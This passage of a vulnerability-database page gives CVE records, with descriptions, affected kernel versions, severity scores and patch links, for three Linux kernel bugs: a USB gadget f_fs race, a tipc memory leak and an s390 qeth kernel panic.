                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.95",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_fs: Fix race between aio_cancel() and AIO request complete\n\nFFS based applications can utilize the aio_cancel() callback to dequeue\npending USB requests submitted to the UDC.  There is a scenario where the\nFFS application issues an AIO cancel call, while the UDC is handling a\nsoft disconnect.  For a DWC3 based implementation, the callstack looks\nlike the following:\n\n    DWC3 Gadget                               FFS Application\ndwc3_gadget_soft_disconnect()              ...\n  --\u003e dwc3_stop_active_transfers()\n    --\u003e dwc3_gadget_giveback(-ESHUTDOWN)\n      --\u003e ffs_epfile_async_io_complete()   ffs_aio_cancel()\n        --\u003e usb_ep_free_request()            --\u003e usb_ep_dequeue()\n\nThere is currently no locking implemented between the AIO completion\nhandler and AIO cancel, so the issue occurs if the completion routine is\nrunning in parallel to an AIO cancel call coming from the FFS application.\nAs the completion call frees the USB request (io_data-\u003ereq) the FFS\napplication is also referencing it for the usb_ep_dequeue() call.  This can\nlead to accessing a stale/hanging pointer.\n\ncommit b566d38857fc (\"usb: gadget: f_fs: use io_data-\u003estatus consistently\")\nrelocated the usb_ep_free_request() into ffs_epfile_async_io_complete().\nHowever, in order to properly implement locking to mitigate this issue, the\nspinlock can\u0027t be added to ffs_epfile_async_io_complete(), as\nusb_ep_dequeue() (if successfully dequeuing a USB request) will call the\nfunction driver\u0027s completion handler in the same context.  Hence, leading\ninto a deadlock.\n\nFix this issue by moving the usb_ep_free_request() back to\nffs_user_copy_worker(), and ensuring that it explicitly sets io_data-\u003ereq\nto NULL after freeing it within the ffs-\u003eeps_lock.  This resolves the race\ncondition above, as the ffs_aio_cancel() routine will not continue\nattempting to dequeue a request that has already been freed, or the\nffs_user_copy_work() not freeing the USB request until the AIO cancel is\ndone referencing it.\n\nThis fix depends on\n  commit b566d38857fc (\"usb: gadget: f_fs: use io_data-\u003estatus\n  consistently\")"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:11:34.535Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f71a53148ce34898fef099b75386a3a9f4449311"
        },
        {
          "url": "https://git.kernel.org/stable/c/9e72ef59cbe61cd1243857a6418ca92104275867"
        },
        {
          "url": "https://git.kernel.org/stable/c/e500b1c4e29ad0bd1c1332a1eaea2913627a92dd"
        },
        {
          "url": "https://git.kernel.org/stable/c/3613e5023f09b3308545e9d1acda86017ebd418a"
        },
        {
          "url": "https://git.kernel.org/stable/c/a0fdccb1c9e027e3195f947f61aa87d6d0d2ea14"
        },
        {
          "url": "https://git.kernel.org/stable/c/73c05ad46bb4fbbdb346004651576d1c8dbcffbb"
        },
        {
          "url": "https://git.kernel.org/stable/c/d7461830823242702f5d84084bcccb25159003f4"
        },
        {
          "url": "https://git.kernel.org/stable/c/24729b307eefcd7c476065cd7351c1a018082c19"
        }
      ],
      "title": "usb: gadget: f_fs: Fix race between aio_cancel() and AIO request complete",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36894",
    "datePublished": "2024-05-30T15:28:59.689Z",
    "dateReserved": "2024-05-30T15:25:07.066Z",
    "dateUpdated": "2025-11-03T21:55:22.274Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36954 (GCVE-0-2024-36954)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:35 – Updated: 2025-05-04 12:56

Title

tipc: fix a possible memleak in tipc_buf_append

Summary

In the Linux kernel, the following vulnerability has been resolved: tipc: fix a possible memleak in tipc_buf_append __skb_linearize() doesn't free the skb when it fails, so move '*buf = NULL' after __skb_linearize(), so that the skb can be freed on the err path.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/01cd1b7b685751ee4…
	https://git.kernel.org/stable/c/2f87fd9476cf9725d…
	https://git.kernel.org/stable/c/adbce6d20da6254c8…
	https://git.kernel.org/stable/c/42c8471b0566c7539…
	https://git.kernel.org/stable/c/d03a82f4f8144befd…
	https://git.kernel.org/stable/c/614c5a5ae45a92159…
	https://git.kernel.org/stable/c/3210d34fda4caff21…
	https://git.kernel.org/stable/c/97bf6f81b29a8efaf…

Impacted products

Vendor

Product

Version

Linux

Affected: 4b1761898861117c97066aea6c58f68a7787f0bf , < 01cd1b7b685751ee422d00d050292a3d277652d6 (git)
Affected: 64d17ec9f1ded042c4b188d15734f33486ed9966 , < 2f87fd9476cf9725d774e6dcb7d17859c6a6d1ae (git)
Affected: 6da24cfc83ba4f97ea44fc7ae9999a006101755c , < adbce6d20da6254c86425a8d4359b221b5ccbccd (git)
Affected: b7df21cf1b79ab7026f545e7bf837bd5750ac026 , < 42c8471b0566c7539e7dd584b4d0ebd3cec8cb2c (git)
Affected: b7df21cf1b79ab7026f545e7bf837bd5750ac026 , < d03a82f4f8144befdc10518e732e2a60b34c870e (git)
Affected: b7df21cf1b79ab7026f545e7bf837bd5750ac026 , < 614c5a5ae45a921595952117b2e2bd4d4bf9b574 (git)
Affected: b7df21cf1b79ab7026f545e7bf837bd5750ac026 , < 3210d34fda4caff212cb53729e6bd46de604d565 (git)
Affected: b7df21cf1b79ab7026f545e7bf837bd5750ac026 , < 97bf6f81b29a8efaf5d0983251a7450e5794370d (git)
Affected: b2c8d28c34b3070407cb1741f9ba3f15d0284b8b (git)
Affected: 5489f30bb78ff0dafb4229a69632afc2ba20765c (git)
Affected: 436d650d374329a591c30339a91fa5078052ed1e (git)
Affected: ace300eecbccaa698e2b472843c74a5f33f7dce8 (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 4.19.314 , ≤ 4.19.* (semver)
Unaffected: 5.4.276 , ≤ 5.4.* (semver)
Unaffected: 5.10.217 , ≤ 5.10.* (semver)
Unaffected: 5.15.159 , ≤ 5.15.* (semver)
Unaffected: 6.1.91 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:43:50.499Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/01cd1b7b685751ee422d00d050292a3d277652d6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2f87fd9476cf9725d774e6dcb7d17859c6a6d1ae"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/adbce6d20da6254c86425a8d4359b221b5ccbccd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/42c8471b0566c7539e7dd584b4d0ebd3cec8cb2c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d03a82f4f8144befdc10518e732e2a60b34c870e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/614c5a5ae45a921595952117b2e2bd4d4bf9b574"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3210d34fda4caff212cb53729e6bd46de604d565"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/97bf6f81b29a8efaf5d0983251a7450e5794370d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36954",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:15:38.594682Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:59.306Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/tipc/msg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "01cd1b7b685751ee422d00d050292a3d277652d6",
              "status": "affected",
              "version": "4b1761898861117c97066aea6c58f68a7787f0bf",
              "versionType": "git"
            },
            {
              "lessThan": "2f87fd9476cf9725d774e6dcb7d17859c6a6d1ae",
              "status": "affected",
              "version": "64d17ec9f1ded042c4b188d15734f33486ed9966",
              "versionType": "git"
            },
            {
              "lessThan": "adbce6d20da6254c86425a8d4359b221b5ccbccd",
              "status": "affected",
              "version": "6da24cfc83ba4f97ea44fc7ae9999a006101755c",
              "versionType": "git"
            },
            {
              "lessThan": "42c8471b0566c7539e7dd584b4d0ebd3cec8cb2c",
              "status": "affected",
              "version": "b7df21cf1b79ab7026f545e7bf837bd5750ac026",
              "versionType": "git"
            },
            {
              "lessThan": "d03a82f4f8144befdc10518e732e2a60b34c870e",
              "status": "affected",
              "version": "b7df21cf1b79ab7026f545e7bf837bd5750ac026",
              "versionType": "git"
            },
            {
              "lessThan": "614c5a5ae45a921595952117b2e2bd4d4bf9b574",
              "status": "affected",
              "version": "b7df21cf1b79ab7026f545e7bf837bd5750ac026",
              "versionType": "git"
            },
            {
              "lessThan": "3210d34fda4caff212cb53729e6bd46de604d565",
              "status": "affected",
              "version": "b7df21cf1b79ab7026f545e7bf837bd5750ac026",
              "versionType": "git"
            },
            {
              "lessThan": "97bf6f81b29a8efaf5d0983251a7450e5794370d",
              "status": "affected",
              "version": "b7df21cf1b79ab7026f545e7bf837bd5750ac026",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "b2c8d28c34b3070407cb1741f9ba3f15d0284b8b",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "5489f30bb78ff0dafb4229a69632afc2ba20765c",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "436d650d374329a591c30339a91fa5078052ed1e",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "ace300eecbccaa698e2b472843c74a5f33f7dce8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/tipc/msg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.314",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.276",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.217",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.159",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.91",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.314",
                  "versionStartIncluding": "4.19.193",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.276",
                  "versionStartIncluding": "5.4.124",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.217",
                  "versionStartIncluding": "5.10.42",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.159",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.91",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.4.271",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.9.271",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.235",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.12.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: fix a possible memleak in tipc_buf_append\n\n__skb_linearize() doesn\u0027t free the skb when it fails, so move\n\u0027*buf = NULL\u0027 after __skb_linearize(), so that the skb can be\nfreed on the err path."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:56:33.433Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/01cd1b7b685751ee422d00d050292a3d277652d6"
        },
        {
          "url": "https://git.kernel.org/stable/c/2f87fd9476cf9725d774e6dcb7d17859c6a6d1ae"
        },
        {
          "url": "https://git.kernel.org/stable/c/adbce6d20da6254c86425a8d4359b221b5ccbccd"
        },
        {
          "url": "https://git.kernel.org/stable/c/42c8471b0566c7539e7dd584b4d0ebd3cec8cb2c"
        },
        {
          "url": "https://git.kernel.org/stable/c/d03a82f4f8144befdc10518e732e2a60b34c870e"
        },
        {
          "url": "https://git.kernel.org/stable/c/614c5a5ae45a921595952117b2e2bd4d4bf9b574"
        },
        {
          "url": "https://git.kernel.org/stable/c/3210d34fda4caff212cb53729e6bd46de604d565"
        },
        {
          "url": "https://git.kernel.org/stable/c/97bf6f81b29a8efaf5d0983251a7450e5794370d"
        }
      ],
      "title": "tipc: fix a possible memleak in tipc_buf_append",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36954",
    "datePublished": "2024-05-30T15:35:48.665Z",
    "dateReserved": "2024-05-30T15:25:07.080Z",
    "dateUpdated": "2025-05-04T12:56:33.433Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36928 (GCVE-0-2024-36928)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:29 – Updated: 2025-05-04 12:56

Title

s390/qeth: Fix kernel panic after setting hsuid

Summary

In the Linux kernel, the following vulnerability has been resolved: s390/qeth: Fix kernel panic after setting hsuid Symptom: When the hsuid attribute is set for the first time on an IQD Layer3 device while the corresponding network interface is already UP, the kernel will try to execute a napi function pointer that is NULL. Example: --------------------------------------------------------------------------- [ 2057.572696] illegal operation: 0001 ilc:1 [#1] SMP [ 2057.572702] Modules linked in: af_iucv qeth_l3 zfcp scsi_transport_fc sunrpc nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nf_tables_set nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 ip_set nf_tables libcrc32c nfnetlink ghash_s390 prng xts aes_s390 des_s390 de s_generic sha3_512_s390 sha3_256_s390 sha512_s390 vfio_ccw vfio_mdev mdev vfio_iommu_type1 eadm_sch vfio ext4 mbcache jbd2 qeth_l2 bridge stp llc dasd_eckd_mod qeth dasd_mod qdio ccwgroup pkey zcrypt [ 2057.572739] CPU: 6 PID: 60182 Comm: stress_client Kdump: loaded Not tainted 4.18.0-541.el8.s390x #1 [ 2057.572742] Hardware name: IBM 3931 A01 704 (LPAR) [ 2057.572744] Krnl PSW : 0704f00180000000 0000000000000002 (0x2) [ 2057.572748] R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:3 CC:3 PM:0 RI:0 EA:3 [ 2057.572751] Krnl GPRS: 0000000000000004 0000000000000000 00000000a3b008d8 0000000000000000 [ 2057.572754] 00000000a3b008d8 cb923a29c779abc5 0000000000000000 00000000814cfd80 [ 2057.572756] 000000000000012c 0000000000000000 00000000a3b008d8 00000000a3b008d8 [ 2057.572758] 00000000bab6d500 00000000814cfd80 0000000091317e46 00000000814cfc68 [ 2057.572762] Krnl Code:#0000000000000000: 0000 illegal >0000000000000002: 0000 illegal 0000000000000004: 0000 illegal 0000000000000006: 0000 illegal 0000000000000008: 0000 illegal 000000000000000a: 0000 illegal 000000000000000c: 0000 illegal 000000000000000e: 0000 illegal [ 2057.572800] Call Trace: [ 2057.572801] ([<00000000ec639700>] 0xec639700) [ 2057.572803] [<00000000913183e2>] net_rx_action+0x2ba/0x398 [ 2057.572809] [<0000000091515f76>] __do_softirq+0x11e/0x3a0 [ 2057.572813] [<0000000090ce160c>] do_softirq_own_stack+0x3c/0x58 [ 2057.572817] ([<0000000090d2cbd6>] do_softirq.part.1+0x56/0x60) [ 2057.572822] [<0000000090d2cc60>] __local_bh_enable_ip+0x80/0x98 [ 2057.572825] [<0000000091314706>] __dev_queue_xmit+0x2be/0xd70 [ 2057.572827] [<000003ff803dd6d6>] afiucv_hs_send+0x24e/0x300 [af_iucv] [ 2057.572830] [<000003ff803dd88a>] iucv_send_ctrl+0x102/0x138 [af_iucv] [ 2057.572833] [<000003ff803de72a>] iucv_sock_connect+0x37a/0x468 [af_iucv] [ 2057.572835] [<00000000912e7e90>] __sys_connect+0xa0/0xd8 [ 2057.572839] [<00000000912e9580>] sys_socketcall+0x228/0x348 [ 2057.572841] [<0000000091514e1a>] system_call+0x2a6/0x2c8 [ 2057.572843] Last Breaking-Event-Address: [ 2057.572844] [<0000000091317e44>] __napi_poll+0x4c/0x1d8 [ 2057.572846] [ 2057.572847] Kernel panic - not syncing: Fatal exception in interrupt ------------------------------------------------------------------------------------------- Analysis: There is one napi structure per out_q: card->qdio.out_qs[i].napi The napi.poll functions are set during qeth_open(). Since commit 1cfef80d4c2b ("s390/qeth: Don't call dev_close/dev_open (DOWN/UP)") qeth_set_offline()/qeth_set_online() no longer call dev_close()/ dev_open(). So if qeth_free_qdio_queues() cleared card->qdio.out_qs[i].napi.poll while the network interface was UP and the card was offline, they are not set again. Reproduction: chzdev -e $devno layer2=0 ip link set dev $network_interface up echo 0 > /sys/bus/ccw ---truncated---

Severity ?

4.4 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8792b557eb50b986f…
	https://git.kernel.org/stable/c/10cb803aff3b11fe0…
	https://git.kernel.org/stable/c/e28dd1e1bf3ebb52c…
	https://git.kernel.org/stable/c/eae0aec245712c52a…
	https://git.kernel.org/stable/c/8a2e4d37afb8500b2…

Impacted products

Vendor

Product

Version

Linux

Affected: 64e3affee2881bb22df7ce45dd1f1fd7990e382b , < 8792b557eb50b986f2496156d486d0c7c85a1524 (git)
Affected: 86818409f989fee29c38528ed8fb085655603356 , < 10cb803aff3b11fe0bd5f274fc1c231a43e88df6 (git)
Affected: 1cfef80d4c2b2c599189f36f36320b205d9447d9 , < e28dd1e1bf3ebb52cdb877fb359e8978a51576e3 (git)
Affected: 1cfef80d4c2b2c599189f36f36320b205d9447d9 , < eae0aec245712c52a3ce9c05575b541a9eef5282 (git)
Affected: 1cfef80d4c2b2c599189f36f36320b205d9447d9 , < 8a2e4d37afb8500b276e5ee903dee06f50ab0494 (git)
Affected: c33d5a5c5b2c79326190885040f1643793c67b29 (git)
Affected: 29d6fe395087710280f8e11d4ae79569c4cb14b7 (git)

Linux

Affected: 6.5
Unaffected: 0 , < 6.5 (semver)
Unaffected: 5.15.159 , ≤ 5.15.* (semver)
Unaffected: 6.1.91 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 4.4,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "HIGH",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-36928",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-31T18:29:03.569739Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-06T15:55:40.336Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:43:50.063Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8792b557eb50b986f2496156d486d0c7c85a1524"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/10cb803aff3b11fe0bd5f274fc1c231a43e88df6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e28dd1e1bf3ebb52cdb877fb359e8978a51576e3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/eae0aec245712c52a3ce9c05575b541a9eef5282"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8a2e4d37afb8500b276e5ee903dee06f50ab0494"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/net/qeth_core_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8792b557eb50b986f2496156d486d0c7c85a1524",
              "status": "affected",
              "version": "64e3affee2881bb22df7ce45dd1f1fd7990e382b",
              "versionType": "git"
            },
            {
              "lessThan": "10cb803aff3b11fe0bd5f274fc1c231a43e88df6",
              "status": "affected",
              "version": "86818409f989fee29c38528ed8fb085655603356",
              "versionType": "git"
            },
            {
              "lessThan": "e28dd1e1bf3ebb52cdb877fb359e8978a51576e3",
              "status": "affected",
              "version": "1cfef80d4c2b2c599189f36f36320b205d9447d9",
              "versionType": "git"
            },
            {
              "lessThan": "eae0aec245712c52a3ce9c05575b541a9eef5282",
              "status": "affected",
              "version": "1cfef80d4c2b2c599189f36f36320b205d9447d9",
              "versionType": "git"
            },
            {
              "lessThan": "8a2e4d37afb8500b276e5ee903dee06f50ab0494",
              "status": "affected",
              "version": "1cfef80d4c2b2c599189f36f36320b205d9447d9",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "c33d5a5c5b2c79326190885040f1643793c67b29",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "29d6fe395087710280f8e11d4ae79569c4cb14b7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/net/qeth_core_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.5"
            },
            {
              "lessThan": "6.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.159",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.91",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.159",
                  "versionStartIncluding": "5.15.126",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.91",
                  "versionStartIncluding": "6.1.45",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.10.190",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.4.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
